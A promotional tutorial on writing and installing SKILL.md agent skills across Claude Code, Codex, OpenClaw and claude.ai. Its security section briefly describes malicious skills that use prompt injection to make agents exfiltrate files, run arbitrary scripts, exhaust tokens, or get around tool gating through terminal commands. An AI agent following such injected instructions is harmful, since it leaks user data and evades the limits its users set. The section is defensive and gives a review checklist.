How to Use AI Agent Skills in 2026: The Complete Guide

AI agent skills are changing how developers work with coding assistants. Instead of repeating the same instructions every session, you write them once in a SKILL.md file and your agent knows exactly what to do. This guide covers everything: what skills are, how they work across Claude Code, Codex, and OpenClaw, how to write your own, and how to stay safe doing it.
1st MONTH FREE Basic or Pro • code FREE
Claim Offer

Table of Contents

What Are AI Agent Skills?

If you've ever found yourself pasting the same long instructions into ChatGPT, Claude, or Codex at the start of every session—explaining your project's conventions, how to run tests, or how deployments work—skills solve that problem permanently.

An AI agent skill is a reusable instruction bundle that teaches an AI coding assistant a specific procedure. Think of it as a recipe card for your agent: it describes when to activate, what to do, and how to do it. The skill lives in a folder in your project or on your system, and the agent loads it automatically when it's relevant.

At its core, a skill is a folder whose centerpiece is a SKILL.md file. That file contains two parts:

  • YAML frontmatter with metadata (name, description) used for discovery and routing
  • A Markdown body with step-by-step instructions the agent follows when the skill activates

The folder can also include scripts/, references/, and assets/ directories with supporting files the agent can read or execute on demand.

Want to skip writing from scratch? Browse our AI Agent Skills Database — a curated library of 2,636+ ready-to-use SKILL.md files for Claude Code, Codex, OpenAI, and more. Download, customize, and drop them straight into your project.
Skills vs. system prompts vs. tools: System prompts set global constraints. Tools perform side effects (file I/O, API calls). Skills package repeatable procedures plus scripts and assets so they can be versioned, shared, and reused independently—like functions for your AI assistant.

How Skills Work: Progressive Disclosure

Skills don't dump their entire contents into the AI's context window from the start. That would waste tokens and slow things down. Instead, every major platform uses a three-tier progressive disclosure model:

The Skill Lifecycle

1️⃣
Catalog Name + description only
2️⃣
Activate Full SKILL.md body loads
3️⃣
Execute Scripts & refs on demand
  1. Catalog disclosure: At session start, the agent sees only each skill's name and description—a compact list that costs minimal tokens. This is enough for the agent to know what's available.
  2. Activation: When the agent determines a skill is relevant (either because you triggered it or because the task matches the description), it loads the full SKILL.md body into context.
  3. Resource loading: Scripts, reference documents, and assets are loaded on-demand only when the instructions reference them—not preemptively.

This design keeps context lean. A project with 20 installed skills might only pay the token cost for 1–2 of them in any given session.

The SKILL.md File Format

The SKILL.md file is the manifest that makes everything work. Here's the anatomy of one:

--- name: deploy-staging description: Deploy the current branch to the staging environment. Use when the user asks to "deploy to staging", "push to stage", or "test in staging". license: MIT compatibility: Requires docker and kubectl. Network access required. --- # Deploy to Staging ## When to use this skill Use when the user wants to deploy their current branch to staging. Trigger phrases: "deploy to staging", "push to stage", "ship it to test" ## Steps 1. Verify the working tree is clean (no uncommitted changes). 2. Run the test suite: `npm test` 3. Build the Docker image: `docker build -t app:staging .` 4. Push and deploy: `kubectl apply -f k8s/staging/` 5. Verify the deployment is healthy. ## Safety - Never deploy with failing tests. - Always confirm with the user before the kubectl apply step.

Required Frontmatter Fields

  • name (required): 1–64 characters, kebab-case (a-z, numbers, hyphens). Must match the parent directory name. No consecutive hyphens.
  • description (required): 1–1024 characters. Explains what the skill does and when to use it. This is the routing signal—make it keyword-rich.

Optional Frontmatter Fields

  • license: License identifier (e.g., MIT, Apache-2.0).
  • compatibility: Runtime requirements (binaries, network, OS).
  • metadata: Additional key-value pairs for platform-specific properties.
  • allowed-tools (experimental): Space-delimited allowlist of tools the skill may use.
Pro tip: The description field is the single most important thing you write. It drives both implicit activation (the agent auto-selects) and search/discovery. Include the actual phrases your team uses—"deploy to staging", "push to prod", "run the migration"—not just technical descriptions.

Skills Across Platforms: A Comparison

The SKILL.md format has been adopted across multiple AI coding platforms, but each implements it differently. Here's how they compare:

Claude Code

Anthropic's CLI agent. Skills live in your project's .claude/skills/ directory or the user-level ~/.claude/skills/. Skills can be invoked as slash commands (e.g., /deploy) or triggered automatically when the agent recognizes a matching task from the description.

.claude/skills/<skill-name>/SKILL.md

OpenAI Codex

OpenAI's coding agent. Scans .agents/skills/ up the directory tree to the repo root, plus user-level ~/.agents/skills and admin /etc/codex/skills. Supports an optional agents/openai.yaml sidecar for UI metadata and MCP tool dependencies.

.agents/skills/<skill-name>/SKILL.md

OpenClaw

Open-source agent with a skill registry (ClawHub). Loads from bundled, managed (~/.openclaw/skills), and workspace sources with configurable precedence. Supports load-time gating (OS, binaries, env vars) and per-run environment injection.

~/.openclaw/skills/<skill-name>/SKILL.md

Claude Web (claude.ai)

Claude.ai has built-in Agent Skills (PowerPoint, Excel, Word, PDF) that activate automatically. Pro/Max/Team/Enterprise users can also upload custom skills as zip files via Settings. Separate from skills, Projects provide persistent instructions and knowledge files across conversations.

Settings → Features → Custom Skills

Claude Code Skills

Claude Code is Anthropic's terminal-based AI coding agent and has the most feature-rich skill implementation of any platform. Skills follow the Agent Skills standard with several powerful Claude-specific extensions.

Skill Scopes

ScopePathWho It Applies To
EnterpriseManaged settingsAll organization users
Personal~/.claude/skills/<name>/SKILL.mdYou, across all projects
Project.claude/skills/<name>/SKILL.mdAnyone working in this repo
Plugin<plugin>/skills/<name>/SKILL.mdWhere the plugin is enabled

Extended Frontmatter (Claude Code-specific)

Claude Code supports several frontmatter fields beyond the base Agent Skills spec:

--- name: my-skill description: What this skill does and when to use it argument-hint: "[issue-number]" # Shown in autocomplete disable-model-invocation: true # Only user can trigger (no auto-trigger) user-invocable: false # Only Claude can trigger (hidden from / menu) allowed-tools: Read, Grep, Glob # Pre-approved tools (no permission prompts) model: claude-opus-4-6 # Override model for this skill context: fork # Run in an isolated subagent agent: Explore # Subagent type: Explore, Plan, general-purpose ---

Claude Code also supports dynamic context injection with !command syntax (shell commands that run before the skill loads) and argument substitution with $ARGUMENTS, $1, $2, etc.

Built-in Skills

Claude Code ships with several skills out of the box:

  • /batch <instruction> — parallel codebase changes across git worktrees
  • /claude-api — loads Claude API reference for your language
  • /debug [description] — troubleshoot sessions
  • /loop [interval] <prompt> — repeat a prompt on a schedule
  • /simplify [focus] — parallel code review and cleanup
Legacy compatibility: If you have old .claude/commands/ files, they still work. Skills and commands share the same frontmatter format, but skills take precedence if both exist with the same name.

OpenAI Codex Skills

Codex uses the .agents/skills/ directory convention and supports both implicit and explicit skill invocation:

  • Implicit invocation: Codex reads the description and automatically activates the skill when it detects a matching task—no slash command needed
  • Explicit invocation: Users type $skill-name to force-activate a specific skill
  • Directory scanning: Codex walks up the directory tree from your current working directory to the repo root, scanning every .agents/skills/ it finds. This means a monorepo can have global skills at the root and sub-project skills in nested directories
  • Sidecar metadata: An optional agents/openai.yaml file can declare UI display names, invocation policies, and MCP tool dependencies
interface: display_name: "Release Manager" short_description: "Cut safe releases with validation gates." policy: allow_implicit_invocation: true dependencies: tools: - type: "mcp" value: "myOrgCI" description: "CI and release tooling"

OpenClaw Skills

OpenClaw is an open-source AI agent that adds several unique capabilities on top of the baseline Agent Skills spec:

  • Load-time gating: Skills can declare prerequisites via metadata.openclaw—required binaries, environment variables, OS, or config values. Skills that don't pass the gate aren't even shown to the model
  • ClawHub registry: A public skill registry where you can browse, install, and publish skills. Think npm for AI agent skills
  • Three-source precedence: Bundled skills (shipped with OpenClaw) → managed skills (~/.openclaw/skills) → workspace skills. Workspace skills override managed, which override bundled
  • Slash commands: Skills can be marked user-invocable: true and given a custom slash command name
  • Environment injection: OpenClaw can inject API keys and environment variables for the duration of a skill's execution, then restore the original environment afterward
ClawHub safety note: There have been reported incidents of malicious skills distributed through open registries like ClawHub. Always review skill contents before installing, especially any bundled scripts. Treat skills from unknown authors like untrusted npm packages.

Claude Web Interface (claude.ai)

Claude's web interface actually has two separate skill-like systems: built-in Agent Skills and Projects.

Built-in Agent Skills

Claude.ai comes with pre-built skills that activate automatically when you create documents:

  • PowerPoint (pptx) — create and edit presentations
  • Excel (xlsx) — create spreadsheets, data analysis, charts
  • Word (docx) — create and edit documents
  • PDF (pdf) — generate formatted PDFs

These work behind the scenes—no setup required. When you ask Claude to "make a slide deck" or "create a spreadsheet," the relevant skill activates automatically.

Custom Skills on claude.ai

On Pro, Max, Team, and Enterprise plans with code execution enabled, you can upload custom skills as zip files through Settings > Features. These skills run in a VM environment where Claude has filesystem access. Note that custom skills are individual to each user and do not sync across surfaces (claude.ai, API, and Claude Code are separate).

Projects (Separate Feature)

Projects on claude.ai provide conversation-level context—custom instructions and knowledge files that persist across chats within a project. This is a different feature from Skills, but serves a complementary purpose:

  • Create a Project: From the Claude sidebar, create a new Project and give it a name
  • Add Custom Instructions: Write instructions that persist across every conversation in the project
  • Upload Reference Files: Attach documents, code samples, or data files that Claude can reference

Think of it this way: Projects provide context (who you are, what you're working on), while Skills provide capabilities (procedures the agent can execute).

Quick Comparison Table

Feature Claude Code Codex OpenClaw Claude Web
Skill format SKILL.md SKILL.md SKILL.md Zip upload / built-in
Skill directory .claude/skills/ .agents/skills/ ~/.openclaw/skills/ Settings > Features
Auto-trigger Yes (via description) Yes (implicit invocation) Yes (with gating) Yes (built-in skills)
Slash commands Yes (/skill-name) Yes ($skill-name) Yes (configurable) No
Script bundling Yes Yes Yes Yes (runs in VM)
Public registry Community sharing Built-in installers ClawHub No
Platform sidecar Extended frontmatter agents/openai.yaml metadata.openclaw No

How to Create Your First Skill

Let's walk through creating a skill from scratch. This example works on any Agent Skills-compatible platform—just adjust the directory path.

1

Create the Skill Directory

Make a folder for your skill. The folder name should match the skill's name field.

# For Claude Code: mkdir -p .claude/skills/run-tests # For Codex: mkdir -p .agents/skills/run-tests # For OpenClaw: mkdir -p ~/.openclaw/skills/run-tests
2

Write the SKILL.md File

Create SKILL.md inside your skill folder with frontmatter and instructions:

--- name: run-tests description: Run the project test suite and report results. Use when the user says "run tests", "check tests", or "are the tests passing". --- # Run Tests ## When to use this skill Use when the user asks to run, check, or verify tests. Do NOT use when the user only asks about test coverage or wants to write new tests. ## Steps 1. Check which test runner is configured (look for jest.config, vitest.config, pytest.ini, etc.) 2. Run the appropriate test command. 3. If tests fail, summarize which tests failed and why. 4. If all tests pass, confirm with a brief summary. ## Safety - Never modify test files unless explicitly asked. - If the test suite takes longer than 5 minutes, warn the user before running.
3

Add Supporting Files (Optional)

If your skill needs scripts or reference docs, add them to subdirectories:

run-tests/ SKILL.md # Main manifest scripts/ run_tests.sh # Helper script references/ test-conventions.md # Project test patterns
4

Test It

Start a new session with your agent and try triggering the skill:

  • Implicit: Just say "run the tests" and see if the agent activates your skill
  • Explicit: Use the platform's invocation syntax (/run-tests in Claude Code, $run-tests in Codex)

If the skill doesn't trigger, refine the description field—it's almost always a routing problem.

Real-World Skill Example: CSV Analyzer

Here's a more substantial skill that bundles a Python script and a reference template. This demonstrates how skills handle multi-step workflows with validation gates:

--- name: csv-insights description: Summarize CSV files into a markdown report with chart images. Use when the user mentions CSV analysis, cleaning, or summary reporting. compatibility: Requires python3 and a writable working directory. metadata: author: "data-platform" version: "1.2.0" --- # CSV Insights ## When to use this skill Use when the user asks for: "summarize this CSV", "clean up this dataset", "make a chart from my spreadsheet", "top N rows by metric". Do NOT use when the user only wants a quick explanation without processing files. ## Inputs - A CSV path (local to the execution environment) - Optional: column names to prioritize ## Outputs - outputs/report.md - Optional: outputs/charts/*.png ## Workflow 1. Validate input file exists and is a CSV. - If not, stop and ask for the correct path. 2. Run the analyzer script: python3 scripts/analyze_csv.py --input "<CSV_PATH>" --out "outputs/report.md" 3. Validate the report contains: - Dataset shape - Missingness summary - Top 5 rows preview 4. If charts were requested, ensure at least one image exists. 5. If validation fails, fix and re-run once. ## Gotchas - If a CSV uses semicolons as delimiter, detect and pass --delimiter. - If the file exceeds 100MB, sample rows and say you sampled. ## References - See references/report-template.md for the report layout template.

This skill follows the "plan-validate-execute" pattern recommended by the Agent Skills specification. The agent won't blindly run the script—it validates inputs first, checks outputs after, and has a clear error-handling path.

Installing and Sharing Skills

Skills are just folders with files, so sharing them is straightforward:

Sharing via Git

The simplest approach: commit your .claude/skills/ or .agents/skills/ directory to your repository. Every team member who clones the repo gets the skills automatically. This is the recommended approach for project-specific skills.

User-Level Skills

For personal skills you want across all projects, place them in the user-level directory:

  • Claude Code: ~/.claude/skills/
  • Codex: ~/.agents/skills/
  • OpenClaw: ~/.openclaw/skills/

Registry Installation (OpenClaw)

OpenClaw's ClawHub provides a public registry where you can browse and install community skills. It works similarly to npm: search, review, install, and pin versions. Codex also has built-in installer commands for skills.

Pre-Built Skill Libraries

If you don't want to write skills from scratch, our AI Agent Skills Database has over 2,636 curated SKILL.md files ready to download for Claude Code, Codex, OpenAI, and other platforms. Just download, drop into your skills directory, and you're good to go.

Zip Bundles (OpenAI Skills Tool)

The OpenAI Skills tool (via the Responses API) accepts skills as zip uploads with specific constraints: exactly one SKILL.md per bundle, validated frontmatter, and hard limits on zip size and file count.

Portability tip: If you want a skill to work on both Claude Code and Codex, you can symlink the same skill folder into both .claude/skills/ and .agents/skills/. The SKILL.md format is identical.

The Agent Skills Open Specification

The Agent Skills specification (agentskills.io), originally developed by Anthropic, has become the dominant cross-platform standard. As of early 2026, over 30 agent products have adopted it—including competitors like OpenAI Codex, Google Gemini CLI, Microsoft/GitHub Copilot, Cursor, JetBrains Junie, and many more.

The spec defines:

  • Required frontmatter: name and description with specific validation rules
  • Optional frontmatter: license, compatibility, metadata, allowed-tools
  • Folder conventions: scripts/, references/, assets/
  • Naming rules: kebab-case, 1–64 characters, no consecutive hyphens, no leading/trailing hyphens
  • Validation tooling: A reference library (skills-ref) for validating skill directories and generating prompt blocks
  • Cross-client path: The .agents/skills/ convention as an interoperability directory that all clients can scan

If you write skills that adhere to the Agent Skills spec, they'll work across platforms with minimal or no changes. The .agents/skills/ directory convention means a skill written for Claude Code can work in Codex, Gemini CLI, Cursor, and others without modification.

Supported platforms include: Claude Code, Claude.ai, OpenAI Codex, VS Code/Copilot, GitHub Copilot, Cursor, Gemini CLI, JetBrains Junie, Roo Code, Goose, OpenHands, Amp, Letta, Firebender, Databricks, Snowflake, Spring AI, Laravel Boost, Mistral Vibe, TRAE (ByteDance), Qodo, and more.

The spec also provides an implementor guide with guidance on:

  • How to discover skills (scan project + user scopes)
  • How to parse frontmatter (handle malformed YAML gracefully)
  • How to manage context (prevent skill instructions from being pruned during long sessions)
  • How to handle trust (gate project-level skills in untrusted repositories)
.agents/skills/ # Interoperability convention deploy-staging/ SKILL.md # Manifest + instructions scripts/ validate_deploy.sh # Non-interactive, has --help references/ runbook.md # Linked from SKILL.md body assets/ config-template.yaml # Templates, samples

Security and Safety: Treating Skills Like Code

This is the section most people skip. Don't.

Skills are privileged instructions with real security implications. When an agent loads a skill, it follows those instructions with the same trust it gives system prompts. A malicious skill can:

  • Exfiltrate data through prompt injection (asking the agent to send file contents to external services)
  • Execute arbitrary code via bundled scripts
  • Exhaust tokens and inflate costs (documented in academic research as "Clawdrain" attacks)
  • Bypass tool restrictions by instructing the agent to use terminal commands instead of gated tools
Real incidents have occurred. Malware has been distributed through open skill registries. A 1Password analysis showed that malicious skills can bypass tool-gating assumptions by social-engineering agents into running terminal commands. Academic research has demonstrated Trojanized skills that cause multi-turn token exhaustion.

Your Security Checklist

  1. Review before installing: Read the SKILL.md and every bundled script before adding a skill from an external source. Treat it like reviewing a pull request.
  2. Pin versions: If using a registry, pin to specific versions rather than tracking latest.
  3. Trust boundaries: Don't auto-load project-level skills from freshly cloned repositories without reviewing them first. Some platforms gate this automatically.
  4. Minimize privileges: Use allowed-tools where supported to restrict what the agent can do during skill execution.
  5. Approval gates: Design skills with explicit confirmation steps before destructive actions (deleting files, deploying, sending messages).
  6. Keep scripts minimal: Bundled scripts should be short, readable, non-interactive, and have no network calls unless absolutely necessary.

Best Practices for Writing Effective Skills

After studying how skills work across platforms and reading the Agent Skills authoring guidance, here are the patterns that consistently produce the best results:

Write for Your Agent, Not for Humans

Skills are instructions for an AI, not documentation for developers. Be imperative: "Run npm test" rather than "The test suite can be executed via npm." Include explicit defaults: "If the user doesn't specify a branch, use main." Don't offer menus of options—make the decision and let the user override.

Include Negative Triggers

Always define when the skill should not activate. Without this, you'll get false triggers that frustrate users. A good "When to use" section has both positive and negative examples:

## When to use this skill Use when the user asks to: "run tests", "check if tests pass", "verify the test suite". Do NOT use when the user: - Asks to write or create new tests - Asks about test coverage percentages - Mentions "testing" in a non-code context

Keep the Body Under 5,000 Tokens

The entire SKILL.md body loads into context on activation. If it's too long, it wastes context window space and may cause the agent to miss important parts. Move detailed reference material into references/ files and link to them from the body.

Design Scripts for Agents

If your skill bundles scripts, design them for non-interactive use:

  • Accept all inputs as command-line arguments (no interactive prompts)
  • Include a --help flag with clear usage information
  • Output structured data (JSON) where possible
  • Return meaningful exit codes and error messages
  • Default to safe behavior (dry-run mode for destructive operations)

Test With Eval Prompts

The Agent Skills spec recommends building a set of test prompts: at least 5–10 that should trigger the skill and 3–5 that should not. Run "with skill" vs. "without skill" baselines to measure whether the skill actually helps. Track token usage if your platform exposes it.

Version and Iterate

Skills aren't write-once. As your project evolves, update the skill. When your deployment process changes, update the deploy skill. When your team adopts a new testing framework, update the test skill. Treat skill maintenance like code maintenance.

Key Takeaways

  • Skills are reusable instruction bundles that teach AI agents specific procedures. They live in SKILL.md files with YAML frontmatter (name + description) and a Markdown body with step-by-step instructions.
  • Progressive disclosure keeps things efficient: agents see only skill names and descriptions at startup, loading full instructions only when a skill is relevant.
  • The format works across platforms: Claude Code, Codex, OpenClaw, and the OpenAI Skills tool all use compatible SKILL.md files. The Agent Skills specification provides the cross-platform standard.
  • The description field is everything: it drives both automatic activation and discovery. Write it like a search query with real trigger phrases your team uses.
  • Treat skills like code dependencies: review before installing, pin versions, gate trust, and design with safety constraints. Real supply-chain attacks have already happened.
  • Start simple: your first skill can be 10 lines of Markdown. You don't need scripts, assets, or complex workflows to get value from skills. A "run tests" or "deploy to staging" skill with 5 clear steps will save your team hours. Or browse 2,636+ ready-made skills in our AI Agent Skills Database.
  • Even web users benefit: Claude's Projects feature provides the same core value—persistent instructions across conversations—without requiring the CLI or SKILL.md files.

The shift happening in 2026 is clear: we're moving from one-shot prompting to persistent, composable agent behaviors. Skills are how you get there. Whether you're using Claude Code, Codex, or OpenClaw, the investment in writing good skills pays for itself in the first week—and compounds from there.

Frequently Asked Questions

Limited Time Offer

Unlock the full power of AI.

Ship better work in less time. No limits, no ads, no roadblocks.

1ST MONTH FREE Basic or Pro Plan
Code: FREE
Full AI Labs access
Unlimited Prompt Builder*
500+ Writing Assistant uses
Unlimited Humanizer
Unlimited private folders
Priority support & early releases
Cancel anytime 10,000+ members
*Fair usage applies on unlimited features to prevent abuse.